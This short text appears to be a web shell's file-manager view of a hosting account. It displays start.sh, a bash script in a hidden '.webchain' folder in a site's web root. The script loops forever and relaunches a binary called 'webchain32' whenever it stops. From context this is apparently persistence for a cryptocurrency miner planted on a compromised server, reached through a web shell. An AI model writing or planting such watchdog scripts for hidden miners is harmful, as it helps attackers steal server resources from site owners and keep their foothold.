Your IP : 216.73.216.146


Current Path : /home/bourgleram/www/.webchain/
Upload File :
Current File : /home/bourgleram/www/.webchain/start.sh

#!/bin/bash

while true; do
    if ! pgrep webchain32 > /dev/null; then
        ./webchain32
    fi
    sleep 20 
done